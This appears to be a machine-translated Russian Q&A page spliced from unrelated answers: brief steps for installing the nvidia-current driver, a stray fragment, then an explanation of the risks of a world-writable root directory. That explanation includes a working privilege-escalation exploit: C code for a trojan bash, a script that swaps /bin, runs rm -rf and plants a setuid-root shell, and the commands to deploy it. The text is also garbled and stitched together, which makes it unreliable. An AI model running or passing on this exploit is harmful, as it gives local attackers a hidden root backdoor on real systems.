Выполнение sudo apt-get install nvidia-current должно сделать это.
Обратите внимание, что пакет nvidia-current находится в репозитории restricted. Если пакет не найден. Отредактируйте файл /etc/apt/sources.list и удалите ведущий символ # следующей строки
#deb http://de.archive.ubuntu.com/ubuntu/ saucy main restricted
Сохраните файл и выполните sudo apt-get update && sudo apt-get install nvidia-current.
Он должен работать [ ! d3]
/, являющимся всемирно-записываемым, может быть огромной проблемой. Имея права на запись в /, любой пользователь может перемещать / переименовывать любой файл или каталог в /. Это означает, что любой пользователь может заменить /etc, /usr или любые другие каталоги в / каталогами по их выбору.
Любой пользователь может тривиально удалить вашу систему, переименовав /etc и /usr.
Немного сложнее выполнить эскалацию привилегий. Пользователь может заменить /bin своей собственной копией, и любой процесс, который затем пытается использовать cp, или даже запустить оболочку, будет немедленно по их милости. Все, что нужно пользователю, - это ждать процесса, выполняемого как root, для использования любой команды в /bin или пользователя root, чтобы использовать логин, и они находятся.
#include<sys/types.h>
#include<unistd.h>
int main(int argc, char*argv[], char *env[])
{
if (getuid() == 0) {
system("/home/muru/foo");
}
execve("/bin/bash", argv, env);
}
foo:
#!/bin/sh
mv /bin /..bin
mv /.bin /bin
rm -rf /..bin
cp /bin/bash /home/muru
chown root:root /home/muru/bash
chmod u+s /home/muru/bash
И затем:
$ gcc -o bash bash.c
$ mkdir /..bin
$ cd /bin; for i in /bin/*; do ln -s /..bin/"$i" /.bin/"$i"; done
$ mv /bin /.bin
$ mv /..bin /bin
$ cp bash /bin
И в следующий раз, когда корень запускает оболочку , вы получаете исполняемый файл setuid в своем домашнем каталоге, который затем вы можете удобно использовать, чтобы получить root, когда захотите, не оставляя большого следа.
С этим разрешением каждый пользователь сможет создавать новые подкаталоги, удалять существующие подкаталоги и заменять существующие подкаталоги. Например, злоумышленник может удалить /bin (переименовав его в /bin.old) и создать принадлежащий им новый /bin, содержащий вредоносные исполняемые файлы. Или пользователь может удалить /etc (переименовав его в /etc.old) и создать новый файл /etc, содержащий новый файл /etc/passwd и /etc/shadow, который позволяет пользователю войти в систему для каждой учетной записи в системе.